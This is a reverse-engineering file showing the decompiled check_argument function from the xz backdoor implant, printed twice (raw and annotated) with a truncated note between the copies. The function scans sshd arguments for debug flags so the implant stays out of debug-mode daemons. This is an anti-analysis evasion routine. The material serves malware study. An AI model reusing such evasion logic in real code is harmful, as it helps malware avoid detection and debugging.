xzregh/1039C0_check_argument.c
// /home/kali/xzre-ghidra/xzregh/1039C0_check_argument.c
// Function: check_argument @ 0x1039C0
// Calling convention: __stdcall
// Prototype: char * __stdcall check_argument(char arg_first_char, char * arg_name)


/*
 * AutoDoc: Sanity-checks a dash-prefixed argv entry by sliding a two-byte window across it and immediately returning the current
 * pointer when either byte is the lowercase letter `d`. `process_is_sshd` treats that non-null result as grounds to abort,
 * which keeps the implant out of sshd instances started with `-d`, `--debug`, or any argument that embeds a lowercase
 * debug flag. Arguments containing control characters or `=` bail out of the loop without ever tripping the match, so only
 * the specific `-d` style switches are rejected.
 */

#include "xzre_types.h"

char * check_argument(char arg_first_char,char *arg_name)

{
  ushort uVar1;
  ushort uVar2;
  ushort uVar3;
  u16 mirrored_word;
  u16 flag_word;
  
  if (arg_first_char == '-') {
    while( TRUE ) {
      uVar1 = *(ushort *)arg_name;
      uVar3 = uVar1 << 8;
      uVar2 = uVar1 & 0xff00;
      if ((uVar2 == 0x6400) || (uVar3 == 0x6400)) break;
      if ((((uVar1 & 0xdf00) == 0) ||
          (((uVar2 == 0x900 || (uVar2 == 0x3d00)) || ((uVar3 & 0xdf00) == 0)))) ||
         ((uVar3 == 0x3d00 || (uVar3 == 0x900)))) goto LAB_00103a17;
      arg_name = (char *)((long)arg_name + 2);
    }
  }
  else {
LAB_00103a17:
    arg_name = (char *)0x0;
  }
  return arg_name;
}



xzregh/1039C0_check_argument.c (lines 7-34) now exposes the dash-prefixed argv scanner with named temps (window_chars, current/following_char_word) plus inline comments that spell out the sliding 2-by

xzregh/1039C0_check_argument.c
// /home/kali/xzre-ghidra/xzregh/1039C0_check_argument.c
// Function: check_argument @ 0x1039C0
// Calling convention: __stdcall
// Prototype: char * __stdcall check_argument(char arg_first_char, char * arg_name)


/*
 * AutoDoc: Slides a two-byte window across dash-prefixed argv entries and reports the first position whose bytes contain lowercase `d`. `process_is_sshd` treats that non-NULL pointer as proof sshd was launched with `-d`/`--debug`, so the loader stays away from debug-mode daemons. Control bytes, tabs, and `=` terminate the walk early and force a NULL return so only clean switches reach the matcher.
 */

#include "xzre_types.h"

char * check_argument(char arg_first_char,char *arg_name)

{
  u16 window_chars;
  u16 following_char_word;
  u16 current_char_word;
  
  // AutoDoc: Only inspect argv entries that began with `-`; everything else returns NULL immediately.
  if (arg_first_char == '-') {
    while( TRUE ) {
      // AutoDoc: Load two characters at a time so the loop can compare both bytes without calling strlen().
      window_chars = *(ushort *)arg_name;
      current_char_word = window_chars << 8;
      following_char_word = window_chars & 0xff00;
      // AutoDoc: Stop as soon as either byte in the window equals lowercase `d` and return that pointer.
      if ((following_char_word == 0x6400) || (current_char_word == 0x6400)) break;
      // AutoDoc: Abort the scan when the pair contains control characters, TAB, or `=`—those inputs fall through to NULL.
      if ((((window_chars & 0xdf00) == 0) ||
          (((following_char_word == 0x900 || (following_char_word == 0x3d00)) || ((current_char_word & 0xdf00) == 0)))) ||
         ((current_char_word == 0x3d00 || (current_char_word == 0x900)))) goto LAB_00103a17;
      // AutoDoc: Advance by one `ushort` (two more characters) before the next comparison.
      arg_name = (char *)((long)arg_name + 2);
    }
  }
  else {
LAB_00103a17:
    arg_name = (char *)0x0;
  }
  return arg_name;
}

